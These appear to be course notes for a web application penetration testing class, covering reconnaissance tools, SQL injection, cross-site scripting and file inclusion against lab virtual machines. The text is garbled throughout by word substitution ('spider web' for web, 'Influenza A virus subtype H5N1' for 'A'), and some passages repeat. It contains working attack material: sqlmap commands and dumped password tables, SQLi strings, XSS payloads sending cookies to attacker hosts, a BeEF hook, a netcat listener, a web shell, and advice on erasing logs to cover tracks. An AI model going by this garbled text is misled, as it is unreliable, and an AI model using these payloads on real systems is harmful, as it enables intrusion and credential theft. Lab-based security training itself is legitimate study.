Introduction
In the previous video was examined packets. We travel along the give-and-take of spider web communications yesteryear taking a await into the heart together with soul protocols of spider web app communications: HTTP together with HTTPS.
HTTP consists of diverse types of requests amongst the telephone commutation ones yesteryear Get, Head, Delete, Post, together with Put. The TCP port for HTTP is port 80.
The secure version of spider web app communications is HTTPS together with it communicates over TCP port 443. It usage SSL/TLS certificates granted yesteryear a certificate potency to vouch for the site owner’s identity. It also encrypts the information going across the connector for additional security.
Tools
In this video nosotros travel over the essential tools that are part of the spider web app pentester’s tool kit. The heart together with soul testing platform is a virtualized environs – either VMWare or VirtualBox – running Kali Linux.
The tools discussed are:
- Vega spider web vulnerability scanner.
- BurpSuite spider web vulnerability scanner.
- SQLMap automatic SQL injection together with database enumeration tool.
- Arachni spider web app assault together with audit framework.
- W3AF network fuzzer.
- Nikto opened upward source spider web server scanner.
- SearchSploit database exploit tool.
- NMAP network regain together with mapping tool.
Packets
Packets are the essence of spider web communications together with inwards this video nosotros beak over parcel basics together with how they tin dismiss hold out manipulated to assault together with exploit spider web apps.
We beak over what a parcel is, what makes upward a parcel inwards terms of its fields, together with how to capture parcel information using parcel sniffing tools such every bit wireshark.
In addition, nosotros examine parcel responses inwards the cast of HTML condition codes. Finally, the importance of packets inwards spider web app exploits is discussed amongst regards to hidden HTML cast fields together with how apps are tricked into giving upward sensitive information via parcel manipulation. An representative of such manipulation is the creation of simulated browser cookies.
What is a packet? Influenza A virus subtype H5N1 parcel is a unit of measurement of information which is transported across networks to facilitate communications betwixt hosts. Influenza A virus subtype H5N1 parcel is how nosotros browse the web, stream movies, send txt messages, together with do everything else on the Internet.
HTTP Notes
In the previous video was examined packets. We travel along the give-and-take of spider web communications yesteryear taking a await into the heart together with soul protocols of spider web app communications: HTTP together with HTTPS.HTTP consists of diverse types of requests amongst the telephone commutation ones yesteryear Get, Head, Delete, Post, together with Put. The TCP port for HTTP is port 80.
The secure version of spider web app communications is HTTPS together with it communicates over TCP port 443. It usage SSL/TLS certificates granted yesteryear a certificate potency to vouch for the site owner’s identity. It also encrypts the information going across the connector for additional security.
We travel along the give-and-take of spider web communications yesteryear taking a await into the heart together with soul protocols of spider web app communications: HTTP together with HTTPS.
HTTP consists of diverse types of requests amongst the telephone commutation ones yesteryear Get (retrieves data), Head (used to acquire metadata), Delete (deletes resources off a server) , Post (used for submission of spider web forms), together with Put (used to force a resources to a spider web server).
The TCP port for HTTP is port 80.
Sent Status Codes:
1xx - informational
2xx - success codes ( 200 - OK)
3xx - redirection (301 - moved permanently)
4xx- client fault (404 - non found)
5xx - server fault (503 - service unavailable)
HTTPS: port 443, SSL/TLS, user certificates from a certificate potency (SSL certificates are exchanged, encryption keys are exchanged).
HTTP consists of diverse types of requests amongst the telephone commutation ones yesteryear Get, Head, Delete, Post, together with Put. The TCP port for HTTP is port 80.
The secure version of spider web app communications is HTTPS together with it communicates over TCP port 443. It usage SSL/TLS certificates granted yesteryear a certificate potency to vouch for the site owner’s identity. It also encrypts the information going across the connector for additional security.
HTTPs prevents human being inwards the middle attack, prevents relaxation dropping from parcel analysis tools.
Why Sites Get Hacked 1:
These are genuinely a serial of steps which comprise the hacker methodology.
The primary argue websites are hacked is because they introduce a large assault surface. Web apps are software projects that are acre of study to the vulnerabilities of pitiful coding practices that outcome for inadequately grooming developers typically working nether terms constraints where the priority is to ship product. Security is usually non a priority together with is oftentimes an afterthought.
Foot printing where the terrain of a webserver is identified is the showtime measuring inwards the hacker methodology. This is accomplished via pings sweeps, Google dorking, together with Whois together with Web Archive lookups.
Increase inwards to a greater extent than information available online together with increased vulnerabilities brand websites slow prey for attackers.
Attacks: XSS (used to inject code onto a website together with bypass access controls), SQL (used to enumerate databases), LFI (an assailant is able to traverse a file system), RFI (an assailant tin dismiss execute a remote file on a webserver to pocket data), URL Manipulation (used to gain access or information from a website when pitiful users controls are inwards place).
Footprinting - ping sweeps, whois, google hacking/dorking, The Internet Time Machine (https://archive.org/web/)
Why Sites Get Hacked 2
The adjacent measuring inwards planning an assault is to enumerate the diverse ports, IP addresses, OSes, services, together with software versions running within a target’s environment. This is performed inwards gild to uncover potential vulnerabilities which tin dismiss together with then hold out exploited.
Tools used inwards this measuring include NMAP, Armitage, together with ZenMap.
Scanning together with enumeration:
- ports, IP addresses, OS, services
- usage Armitage to do a scan
nmap -A 192.168.1.10
ZenMap scanning
Why Sites Get Hacked 3:
After the network terrain has been mapped out, nosotros ask to get probing for vulnerabilities.
This is accomplished inwards ii ways: manually together with automatically via scanning. We beak over diverse manual methods along amongst several automated tools such every bit Nessus, Armitage, together with Searchploit.
#searchsploit Apache httpd
Enumeration:
You volition ask to probe for vulnerabilities. Once services have got been mapped out, essay default credentials to logon to them! You tin dismiss banking concern check exploit databases to position vulnerable versions of software!
Why Sites Get Hacked 4
Gaining access:
- Exploit published vulnerabilities most software versions running on the site.
- Gain access if a service is using default credentials.
- Exploit the weakest link: humans.
- Attempt a “Hail Mary” using Armitage
If a slice of software has a published vulnerability this tin dismiss hold out used to gain acess.
You tin dismiss gain access if a service is using default username together with credentials. You tin dismiss drib a USB pollex drive inwards the parking lot, amongst a backdoor together with hold off for soul to plug it in.
If no default credentials or vulnerabilities are establish users tin dismiss hold out targeted to gain access.
In Armitage, there's an selection to Hail Mary, which volition run all exploits at a machine. We could acquire an exploit/session or not. This could hold out useful inwards critical environments, such every bit a infirmary to evidence for exploits a system.
Maintaining access afterwards it has been achieved. This is 1 of the to a greater extent than hard steps inwards the methodology every bit many blood-red flags tin dismiss potentially hold out raised, which tin dismiss plow the tables together with have got the victim pursuing the assailant yesteryear directing pings at them!
An of import measuring inwards non beingness discovered is the deletion of whatever artifacts left behind such as:
- Scheduled services
- Files
- Any user accounts that were created
- Logs
In gild to best keep access scheduled services which volition opened upward a backdoor or communicate amongst a listener volition ask to hold out laid up.
This tin dismiss hold out performed manually or through script which would hold out ran 1 time you lot gain access.
Finally you lot ask to comprehend your tracks when your on the target or have got finished.
This tin dismiss hold out accomplished through deletion of artifacts such every bit scheduled services, files, user accounts that have got been created, together with logs.
Best Practices:
As a professional person spider web app pentester, you lot must deport yourself together with your activities inwards an organized together with professional person manner. This is extremely of import since your activities are virtually indistinguishable from a existent attacker. The call of the game is to protect yourself!
Key components of pentesting best practices are:
- Gain written permission most what targets volition hold out tested, how long volition they hold out performed, together with when things volition hold out tested.
- Create documentation that records the tests such every bit output from wireshark together with tcpdump along amongst logs most what you lot did.
- Build reports most what was discovered together with how to gear upward vulnerabilities.
- Establish a skillful working human relationship amongst other departments to stave off whatever potential misunderstandings during testing.
IaaS, SaaS or PaaS -
If an online site is scanned, together with is hosted yesteryear some other company, permission should hold out received from that company, to allow the pentester to perform that activity.
Documentation should hold out maintained, inwards gild to protect yourself. As presently every bit you lot acquire on a network anything that goes incorrect volition hold out blamed on you. Keeping proper documentation volition give you lot the mightiness to position what you lot did to harm the network or protect yourself from accusations. This documentation should hold out automatic or manual.
Automatic: should hold out Wireshark or tcpdump. This type of documentation allows for accountability of what has happened over the network.
Manual: should include a listing of all commands used, what fourth dimension they were used, together with what scheme it was used on.
Keep detailed documentation!
Building reports:
Reports should hold out comprehensive together with slow for customers to understand.
There are key elements each written report should include:
- the vulnerability type
- where it was found
- how it affects the customer
- suggested fix!!!! Know how to gear upward vulnerabilities!
Best Practices 2
In this instant video on spider web app pentesting best practices, nosotros beak over the of import number of when to test. This is of import since the customer’s operations tin dismiss hold out negatively impacted every bit a outcome of your testing.
In the understanding discussed inwards the previous video most gaining permission, you lot volition also ask to specify when you lot volition hold out testing. Testing that places a large charge on a scheme should hold out performed off-hours, most typically at night. However, sure as shooting types of tests volition ask to hold out performed during normal operating hours inwards gild to position if the client is capable of detecting diverse kinds of attacks yesteryear way of their intrusion detection system.
When to test
- this should hold out placed inwards the understanding that is made prior to testing because when to evidence is only every bit of import every bit what to evidence few a few reasons
- testing that places a large charge on a scheme should hold out done at night. If the scheme goes downward it gives the client fourth dimension to take away it dorsum upward earlier normal hours.
- if a spider web app is developed correctly it tin dismiss take away a beating, soundless non all spider web apps are developed to grip large amounts of malicious traffic
- certain types of tests should hold out done during normal operating hours. This tin dismiss hold out used to position if the customers tin dismiss grab the attack.
Working amongst other departments
- many times you lot volition have got to piece of work amongst systems that are utilized together with maintained yesteryear multiple departments
- it is of import to develop relations amongst all the departments that your testing volition affect
- if you lot neglect to do therefore together with something happens (such every bit the spider web app crashing) departments that are unsure of you lot may acquire aggressive together with essay to blame you lot fifty-fifty if you haven't fifty-fifty begun testing yet.
Environment Setup
- Kali 2.0
- Pentester Labs:
https://pentesterlab.com/exercises/
Download:
- from SQL injection to shell
- spider web for pentester
https://pentesterlab.com/exercises/web_for_pentester
https://pentesterlab.com/exercises/from_sqli_to_shell
MODULE 2
What is SQL Injection 1
This lesson covers SQL injection. In this lesson, participants larn about:
1. What is a SQL Inject?
2. How it works
3. Types
4. Examples
1. What is a SQL Inject?
2. How it works
3. Types
4. Examples
Influenza A virus subtype H5N1 SQL inject is a cast of assault which takes wages of an improperly filtered user together with takes the input acquired to enumerate together with manipulate a database. This lesson discusses ii types of SQL Injections which are classic together with blind. The teacher also offers examples of where to inject an SQL.
What does it mean? It agency that an assailant tin dismiss usage statements to send commands to a SQL database together with acquire information dorsum from it. An assailant could also usage this declaration to manipulate information on a database every bit well.
There are 2 types:
- Classic SQLi
- Blind SQL Injection
Classic SQLi
- this type occurs when escape characters are improperly filtered. Characters such every bit ' together with '' .
The SQL command is together with then send to the SQL application together with the results are at nowadays displayed to the attacker.
Classic SQLi utilize WHERE clause modification, together with UNION operator injections to exploit the improper filtering.
Blind SQLi
This cast of injection is the same every bit classic SQLi except the assailant is non able to at nowadays run into the results.
For spider web applications that ask tested for Blind SQLi, it is best to usage automated tools.
These would would be:
- BSQL Hacker
- SQLMap
- SQLNinja
- Mole
- SQLSus
Spidering 1
This lesson covers spidering. Participants larn about:
1. What is spidering?
1. What is spidering?
Is a technique of mapping a website together with identifying all the pages that are accessible to whatever user. It is done Actively or Passively!
Actively: the tool beingness used to spider clicks on every link together with push together with fills inwards every cast field. The tool volition travel along to follow each page together with non halt until told to do so.
This tin dismiss hold out unsafe because it tin dismiss hold out seen every bit an assault if the tool finds an admin page together with submits a push that deletes users or deletes pages.
Passively:
When passive spidering occurs it acts similar active soundless it volition halt at the adjacent page. Passive tends to hold out safer than active.
Should hold out done prior to testing for vulnerabilities on a webpage for a few of import reasons.
- creating a website map gives automated tools the mightiness to position every possible vulnerable page
- it also gives a tester a ameliorate painting of the website
- spidering tin dismiss also position pages that shouldn't hold out available to the average users, such every bit admin consoles, unfinished pages, or pages that comprise sensitive data.
Spidering is an of import tool when performing spider web app pentesting!
2. How to spider amongst BurpSuite
3. How to spider amongst ZAP
4. Spidering inwards other programs
4. Spidering inwards other programs
Spidering is a technique used to map a spider web site together with position pages that all users have got access to together with is done either actively or passively.
Spidering 2
This lesson offers measuring yesteryear measuring examples of active together with passive spidering inwards BurpSuite.Using the Cali Linux environment, participants have instructions inwards how to deport active together with passive spidering.
Setup your manual proxy configuration to 127.0.0.1:8080 inwards IceWeasel.
If you lot ask to regain the ip address of the vm, but don't have got permissions, do a :
$sudo !!
to acquire the ifconfig of eth0!
You tin dismiss plow off Passive Spidering, inwards Burpsuite nether the Spider tab together with Options tab. Under Passive Spidering, uncheck the Passively Spider every bit you lot browse!
This lesson covers active together with passive spidering using the ZED assault proxy, nether Web Application Analysis inwards Kali.
We volition browse the site together with OWASP ZED volition rail our browsing!
Under Sites inwards ZED, nosotros tin dismiss right click on the target site/IP (in the right pane) together with select Attack - Spider. Down at the bottom nether Processed nosotros volition regain the results of our Spidering.
Spidering 3:
This lesson covers commands inwards how to do spidering inwards SQLMAP using the Python language. Participants larn most the next commands:
1. -U
2. –Forms
3. –Batch
4. –Crawl
5. –Level
6. –Risk
SQLMap:
python sqlmap.py -U http://example.com --forms --batch --crawl=10 --level=5 --risk=3
-U = URL
--batch = non interactive mode, usually SQLMap volition inquire you lot questions, this accepts the default answers
--crawl = how deep you lot desire to crawl a site
--level = dissimilar levels of tests, 1 is default together with v is the most
--risk = dissimilar jeopardy of tests, 1 is default together with 3 is the most.
Discovering SQLi 1
This brief lesson offers a brief introduction into discovering sequel injections.
1. Why it is important?
2. Types of discovery?
a. Manual discovery
b. Automated discovery
3. VEGA
4. SQLMAP
5. NMAP
6. ZAP
7. ARACHNI
1. Why it is important?
2. Types of discovery?
a. Manual discovery
b. Automated discovery
3. VEGA
4. SQLMAP
5. NMAP
6. ZAP
7. ARACHNI
1. If left untested a website could have got vulnerabilities that are ticking fourth dimension bombs.
An SQLi assault could allow an assailant to gain usernames, passwords, together with other sensitivie details most users.
With these details an assailant could elevate their privileges together with laid themselves upward to do farther harm.
If left undetected the attackers could pilfer information for extended periods of fourth dimension (years).
2. Manual: if the website contains a page amongst a URLs that looks similar this "http://www.example.com/page.php?id=1" the easiest way to evidence for a SQL inject is yesteryear doing the following.
ex:
http://www.example.com/page.php?ID='1
http://www.example.com/page.php?ID='1
or
http://www.example.com/page.php?ID=1'
If you lot acquire an fault such every bit the 1 below verifies at that topographic point is a vulnerability.
Warning: MYSQL_FETCH_ARRAY(): supplied declaration is non a valid MYSQL outcome resources inwards /EXAM/PLE/PUBLIC_HTML/EXAMPLE.php on line 5
Warning: MYSQL_FETCH_ARRAY(): supplied declaration is non a valid MYSQL outcome resources inwards /EXAM/PLE/PUBLIC_HTML/EXAMPLE.php on line 5
Testing of cast fields tin dismiss hold out done every bit well.
- 'OR'1'='1
- see text file on external drive for to a greater extent than commands. Look upward file call "Discovering SQLi 1"
This lesson talks most automated types of regain together with teaches participants most the gollowing variants together with where to regain them:
1. VEGA: Freeware together with GUI-based establish on KALI 1 together with 2
2. SQLMAP: Freeware together with CMD line based establish on KALI 1 together with 2
3. NMAP: Freeware together with CMD line based establish on KALI 1 together with 2
4. ZAP: Freeware together with GUI-based establish on KALI 1 together with 2
5. ARACHNI: Freeware together with GUI-based establish via the Arachni Scanner spider web site
6. BurpSuite: Freeware together with GUI-based establish on portswigger.net
This lesson specifically focuses on VEGA together with offers participants step-by-step teaching inwards how to usage it.
VEGA:
apt-get install vega
Then inwards Vega travel to Scan - Start Scan, type IP address, select options for SQLi together with travel through the tutorial leaving everything every bit default.
Then nosotros hold off for the results together with regain out Vega establish eleven vulnerabilities inwards the "Web for Pentesters" vm.
Discovering SQLI 3
This lesson covers commands inwards how to do spidering inwards SQLMAP using the Python language:
1. -U
2. –Forms
3. –Batch
4. –Crawl
5. –Level
6. –Risk
SQLMap:
python sqlmap.py -u http://example.com --forms --batch --crawl=10 --level=5 --risk=3
-U = URL
--batch = non interactive mode, usually SQLMap volition inquire you lot questions, this accepts the default answers
--crawl = how deep you lot desire to crawl a site
--level = dissimilar levels of tests, 1 is default together with v is the most
--risk = dissimilar jeopardy of tests, 1 is default together with 3 is the most.
Using the Kali environment, participants have measuring yesteryear measuring instructions inwards how to deport pen testing.
During SQLi scanning, nosotros tin dismiss Ctrl+C together with select options due south or E to skip over sure as shooting scan types.
Discovering SQLI 4
This lesson offers measuring yesteryear measuring directions inwards how to perform a scan using NMAP.
NMAP tin dismiss hold out used every bit a vulnerability scanner.
This lesson offers examples of scripts which tin dismiss hold out used to accomplish this:
• -p = port number
• -script = calling a script from the library
• -script-arghs = lets you lot customize the script further
nmap -p80 --script=http-sql-injection --script-args=httpspider.maxpagecount=200 <target>
- nosotros got the same results every bit amongst Vega, but nosotros ask to usage multiple tools, but nosotros ask to a greater extent than details, together with nmap cannot give us that!
Discovering SQLI 5
This lesson is most the ZAP assault proxy. Using an application, participants have measuring yesteryear measuring instructions inwards how to spider a spider web page together with and then await at everything it has found. The ZAP assault proxy is able to assault whatever vulnerability that is present.
ZAP:
Scan over again 192.168.2.119.
If you lot desire to alter the Default Policy Manager travel to Analyse together with click on Scan Policy Manager - Modify- Injection - Server Side Include - click on Default nether Threshold to acquire a drop-down menu, to select betwixt Default or Low,Medium,High, etc.
You tin dismiss plow OFF the other options, together with solely plow on the scans that you lot desire for the job.
Discovering SQLI 6
This lesson focuses on the Arachni costless scanner. In this lesson, participants have measuring yesteryear measuring instructions inwards how to cd into Arachni together with usage it to scan for vulnerability via the local host together with admin concern human relationship using the target URL command to banking concern check for SQL injections together with perform a straight scan together with regain examples of SQL injections. You tin dismiss hitting ‘review’ to run into what was injected, what was sent every bit good every bit the response (if any).
#apt-get install arachni
#apt-get update
Go to Web Application Analysis together with await upward Arachni. When you lot start it upward it volition run on http://localhost:9292
Username: admin@admin.admin
Password: administrator
Go to Scans together with select New. Go through the sorcerer to setup your scan job.
You tin dismiss also create additional Profiles, for the types of scans you lot desire to perform.
Exploiting SQLI 1
Exploiting SQL Manually
Exploiting amongst tools: SQLMap, SQLSUS.
Manually:
We tin dismiss use:
either SELECT * FROM USER WHERE NAME="ROOT"
or -1 UNION SELECT 1,2,3,4
or ' AND '1'='1
We tin dismiss usage 'OR'1'='1 inwards :
http://192.168.2.119/sqli/example1.php?name=%27OR%271%27=%271
to dump information inwards the browser most the database.
With the -1 UNION SELECT 1,2,3,4
you tin dismiss start modifying the parameters 1,2,3,4 to dump columns.
It volition hold out a dull process, but you lot won't hold out seen every bit much!
Exploiting SQLI 2
This lesson focuses on using SQL map inwards Kali or Kali 2 to banking concern check a database, run a scan together with regain vulnerabilities.
SQLMap:
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dbs
python sqlmap.py -u "http://www.example.com/page.php?id=1" --tables -d website
python sqlmap.py -u "http://www.example.com/page.php?id=1" --columns -d website -t users
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dump -d website -t users
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example4.php?id=2" --dbs
Result: nosotros dumped 2 databases
[12:29:31] [INFO] the back-end DBMS is MySQL
spider web server operating system: Linux Debian 6.0 (squeeze)
spider web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.12
[12:29:31] [INFO] fetching database names
available databases [2]:
[*] exercises
[*] information_schema
Exploiting SQLI 3
This lesson focuses on how to banking concern check for tables inwards the database using SQLMAP to banking concern check known vulnerable spider web pages.
python sqlmap.py -u "http://www.example.com/page.php?id=1" --tables -d website
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example5.php?id=2" --tables -D exercises
Result:
[12:37:24] [INFO] the back-end DBMS is MySQL
spider web server operating system: Linux Debian 6.0 (squeeze)
spider web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.12
[12:37:24] [INFO] fetching tables for database: 'exercises'
Database: exercises
[1 table]
+-------+
| users |
+-------+
Exercise:
sqlmap -u "http://192.168.2.119/sqli/example5.php?id=2" --columns -D exercises -T users
Result:
[12:38:39] [INFO] fetching columns for tabular array 'users' inwards database 'exercises'
Database: exercises
Table: users
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| age |
| groupid |
| id |
| name |
| passwd |
Exercise:| Column | Type |
+---------+-------------+
| age |
| groupid |
| id |
| name |
| passwd |
python sqlmap.py -u "http://www.example.com/page.php?id=1" --dump -D exercises -T users
Result:
[12:42:40] [INFO] fetching columns for tabular array 'users' inwards database 'exercises'
[12:42:40] [INFO] fetching entries for tabular array 'users' inwards database 'exercises'
[12:42:40] [INFO] analyzing tabular array dump for possible password hashes
Database: exercises
Table: users
[4 entries]
+----+---------+-----+-------+---------+
| id | groupid | historic menses | name | passwd |
+----+---------+-----+-------+---------+
| 1 | 10 | 10 | admin | admin |
| 2 | 0 | 30 | root | admin21 |
| 3 | 2 | 5 | user1 | secret |
| 5 | 5 | 2 | user2 | azerty |
+----+---------+-----+-------+---------+
Exploiting SQLI 4
This lesson focuses on using SQLSUS which is establish on the Kali 2 platform. In this lesson, participants larn how to usage SQLSUS to create a config file, call the attack, nano the file together with and then usage the config file to launch an assault against a vulnerable spider web page to regain tables, columns together with users.
SQLSUS:
sqlsus -g attack //create the config file
nano attack //edit it
$url start="target" //change this within of the assault config file
//replace target within the double quotations with:
http://192.168.2.119/sqli/example5.php?id=2
sqlsus attack
start
acquire <item> //all available items nosotros tin dismiss get
acquire tables //we volition acquire tables
acquire columns users //get columns
select * from users //get password
SQLI Lab
This brief lesson offers an introduction into the SQLI Lab which volition focus on ii things:
• Lab discovery (using either Vega or Zap scan the "SQL to Shell" webpage for a SQLi vulnerability)
• Lab Exploitation ( using SQLmap exploit the spider web page which was identified inwards your scan). Dump the database together with regain the username together with password for the spider web page.
http://192.168.2.8/cat.php?id=3%200%200%20-%20-
http://192.168.2.8/cat.php?id=3 0 0 - -
Check text file for results!
MODULE 3:
What is XSS 1
This lesson offers together with introduction into cross site scripting, also called XSS.
XSS is a client side code vulnerability which allows an assailant to inject malicious scripts together with tin dismiss hold out used to obtain information from a compromised site. XSS is the most mutual vulnerability on spider web sites together with at that topographic point are 3 types: persistent, reflected together with DOM-based. However, this lesson volition solely comprehend the persistent together with reflected types.
This lesson discusses the following:
1. What is XSS?
- XSS is a client-side code vulnerability which allows the assailant to inject code which tin dismiss execute malicious scripts
- this type of assault tin dismiss hold out used to obtain cookies, session tokens, or other sensitive information used amongst a compromised site
- XSS is the most mutual vulnerability discovered together with exploited on websites
- comes amongst 3 flavors which are persistent, reflected together with DOM-Based
- XSS tin dismiss introduce a serious concern for websites which comprise sensitive user data
2. Attack types?
The 3 dissimilar types of XSS are Persistent, Reflected together with DOM-based soundless nosotros volition solely hold out roofing the persistent together with reflected due to them beingness the most common.
Persistent:
- this cast of XSS is the most dangerous
- saves code to the server together with permanently delivers the assault (this tin dismiss most commonly hold out establish on forums together with sites which allow users to post HTML formatted data)
Reflected:
- this is the most mutual type of XSS
- commonly establish inwards HTTP query parameters or inwards HTML cast submissions
- this type of assault is most commonly used amongst a URL that appears to hold out innocent but has a XSS assault located within the link
3. Attack examples
Create a uncomplicated alarm box:
index.php?name=guest<script>alert('attacked')</script>
Send Cookies to a listener:
<script>net image().src="http://<attacker's IP address>/b.php?"+document.cookie;</script>
Call a script from an external source:
<script>document.write('<script src=http://example.com/xss.js></script>')</script>
4. Why is this dangerous?
XSS tin dismiss hold out 1 of the to a greater extent than unsafe types of attacks due to what it tin dismiss do.
If an IFRAME used yesteryear an advertiser is vulnerable to XSS together with then a large number of websites delivering that content at nowadays acquire vulnerable.
It tin dismiss also hold out used to pocket cookies every bit good every bit gain command over a victim's browser via BEFF.
XSS tin dismiss also hold out used to redirect users to a malicious page or convince a user to input their credentials into a cast fields generated yesteryear XSS.
5. Examples of existent globe attacks
To hold out continued...next exercise...
What is XSS 2
This lesson offers some examples of well-known XSS attacks, which include:1. MySpace: This occurred inwards 2005 together with involved the SAMY worm
2. Facebook: This occurred inwards 2011 together with used a code to distribute malware, amongst the code below:
<iframe id="crazydavinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='just visited http://y.ahoo.it/dajeba wow.. cool! squeamish page dude!!!';document.forms[0].submit();}</script>"></iframe>
3. Yahoo: This occurred inwards 2013 together with involved cookie theft
Influenza A virus subtype H5N1 spam message amongst a brusk link to an plainly harmless session of MSNBC led to concern human relationship hijacking via cookie theft!!!
Discovering XSS 1
This lesson continues to comprehend XSS together with focuses on XSS amongst VEGA. Participants have measuring yesteryear measuring instructions inwards how to plow on XSS injection checks to perform a scan.
Discovering XSS amongst tools:
- Nmap
- Arachni
- Vega
- Xsser
Discovering XSS manually!!!!
Prior to performing an automated scan ensure the XSS injection check is selected inwards the select modules menu, inwards VEGA!!!
This lesson offers measuring yesteryear measuring instructions inwards how to usage to ARACHNI tool to do a XSS banking concern check using the Kali tool.
Web Based tool!!!!
localhost:9292
(must run every bit root)
Discovering XSS 3
This lesson is most discovering XSS using NMAP which is script that posts specifically crafted strings to every cast it discovers.
Use the Web for Penters virtual machine!!!
nmap -p80 --script http-stored-xss.nse <target>
This script volition post especially crafted strings to every cast it discovers.
nmap -p80 --script http=stored.xss --script-args=httpspider.maxpagecount=200 192.168.2.119
nmap -p80 --script http-dombased-xss --script-args=httpspider.maxpagecount=200 192.168.2.119
nmap -p80 --script http-phpself-xss --script-args=httpspider.maxpagecount=200 192.168.2.119
Discovering XSS 4
This lesson offers measuring yesteryear measuring instructions inwards how to usage XSSER to regain XSS.
XSSER -c 100 --CW=4 -u <target IP>
xsser -c100 --Cw=4 -u http://192.168.2.119
-c = number of pages to crawl
--Cw = depth of the crawler
-u= URL
Discovering XSS 5
This lesson discusses entering XSS script manually using a listing of commands via Web for Pentester to scan for vulnerabilities.
The best way to evidence for XSS is entering the string below into a mutual acre such every bit the URL:
<script>alert('PWN')</script>
example:
http://example.com/index.php?user=<script>alert('PWN')</script>
If you lot desire to evidence for cookie theft on your application you lot tin dismiss usage the string below:
<script>alert("cookie"+document.cookie)</script>
example:
http://example.com/index.php?user=<script>alert("cookie"+document.cookie)</script>
Discovering XSS 6
This brief lesson offers a demonstration inwards how to usage the document cookie command to trace cookies.
example1.php?name=<script>alert(document.cookie)</script>
Exploiting XSS 1
This video covers exploiting cross site scripting together with covers how to exploit XSS manually via redirection together with cookie theft every bit good every bit how to exploit XSS amongst BEEF.
How to exploit manually:
- redirection
- cookie theft
How to exploit XSS amongst BEEF!
Manually:
The same technique used to position XSS tin dismiss also hold out used to exploit it. Except some additional steps ask to hold out taken.
First nosotros have got to determine what form of assault nosotros desire to perform. Do nosotros desire to redirect the user to a malicious site or do nosotros desire to pocket data?
First nosotros are going to comprehend XSS redirection!
Get the XSS VM from:
https://pentesterlab.com/exercises/xss_and_mysql_file/
Manual redirection:
<img src="http://example.com" onerror=window.open("http://www.google.com","xss",'height=500,width=500');>
Manual Cookie Theft:
Entering the string below into a acre that is known to hold out vulnerable:
<script>new Image().src="http://listener-ip:and port/b.php?"+document.cookie;</script>
<script>new Image().src="http://192.168.2.7:80/b.php?"+document.cookie;</script>
<script>new Image().src="http://<attacker's ip address>/b.php?"+ document.cookie;</script>
Let's pause downward this line a bit:
- <script></script> - this identified the enclosed content every bit a script
- new image().src= - this line identified the server to communicate with
- "http://listener-ip:and port/b.php?"+document.cookie; - this part identified the server the script volition communicate amongst together with volition send cookies amongst the communication.
How do nosotros acquire information dorsum from the attack?
We ask a LISTENER!!!!
We ask a LISTENER!!!!
This tin dismiss hold out accomplished amongst netcat.
#nc -nlvp 80
Netcat listens on port 80, amongst the options v-verbose, p - designated which port to use.
http://www.danscourses.com/Network-Penetration-Testing/xss-with-a-vulnerable-webapp.html
This lesson covers exploiting XSS using the BEEF tool. BEEF is a multi-step procedure which allows an assailant to take away command of victim’s browser.
Exploit XSS amongst BEEF:
Beef is a multi measuring procedure which volition give you lot command over a victims browser.
First step: you lot volition desire to build your malicious code
Second step: brand the URL
Third step: send the URL to a victim
Fourth: $$$$
if you lot are running Kali 2.0 you lot tin dismiss start BEEF from the Applications - Exploitation tools menu.
After that the browse to http://127.0.0.1:3000/UI/Authentication
username:beef
password:beef
Next the malicious code volition ask to hold out crafted:
<script src=http://atackerIP:3000/hook.js></script>
This line tin dismiss hold out establish when you lot initially start BEEF.
Next that code volition ask delivered. This tin dismiss hold out done yesteryear placing it into a vulnerable acre similar nosotros did inwards our prior representative or it tin dismiss hold out delivered via a link similar below:
http://example.com/search.asp?query=<script src=http://attackerIP:3000/hook.js></script>
After the code is delivered you lot hold off for the victim to browse to the site 1 time they do you lot volition acquire confirmation every bit shown below!
The CODE:
<script src="http://192.168.2.21:3000/hook.js"></script>
You ask to have got patience spell you lot exploit through a browser! Don't surrender therefore easily!
XSS Lab
This lesson discusses the XSS lab. The lab volition cover:
• XSS discovery
• XSS Exploitation
• XSS Exploitation (bonus section)
Use VEGA or ZAP to scan "The Web for pentesters" webpage for a XSS vulnerability!
Then, usage a manual script to create an alarm window!
Generate a BEEF link using the exploitable page!
Browse to the generated link together with using the BEEF tools, take away a snapshot of the monitor!
For the Bonus work:
Setup a instant VM
From the instant vm browse to the malicious link!
Use BEEF tools to enumerate information most the novel host!
MODULE 4
LFI & RFI 1
This lesson offers a brief introduction into Local File Inclusion (LFI) together with Remote File Inclusion (RFI) together with volition comprehend the following:
1. What is LFI
LFI is the procedure of including files on a server through a browser.
In uncomplicated terms it allows you lot to sentiment files on a server together with inwards some cases execute commands.
This tin dismiss hold out used to traverse a scheme together with gain access to files that should ordinarily non hold out accessible.
2. What does LFI await like?
Check LFI - what does LFI await like.txt file.
3. Why is LFI dangerous?
LFI every bit I said earlier is used to hold out able to access files. If you lot have got the mightiness to access files every bit rootage user this opens doors to sensitive files.
Check LFI - why is LFI dangeous
4. What is RFI?
See adjacent lesson...
5. What does RFI await similar together with why is it dangerous?
See adjacent lesson...
LFI & RFI 2
This lesson covers how LFI plant using the Kali Box. Participants larn measuring yesteryear measuring instructions inwards how to regain the source of a file. LFI is used to access files together with tin dismiss hold out used to opened upward doors to sensitive files if 1 has the mightiness to access files every bit a rootage user.
4. Why is LFI dangerous?
Because it tin dismiss give away directories together with files nosotros are non meant to access or view!
LFI & RFI 3
This lesson covers RFI.
RFI allows an assailant to upload a custom malicious file onto spider web site or server together with leads to pitiful validation checks inwards spider web sites every bit good every bit code execution which tin dismiss hold out used to deface or gain access to a spider web site.
example:
http://www.example.com/vuln_page.php?file=http://www.badiste.com/malicious
This is dangerous because it allows an assailant to run anything they desire on a server such as:
- a backdoor
- keylogger
- malware distro
- bots
RFI Tool:
https://code.google.com/archive/p/b374k-shell/
If executed properly volition give you lot a PHP shell inwards your browser.
http://192.168.2.119/upload/images/b374k-2.8.php
The password is: b374k
This is a rattling unsafe tool if an attacked were to acquire this onto your system.
LFI & RFI Lab
This lesson offers a brief introduction of the LFI together with RFI lab. This unit of measurement covers:
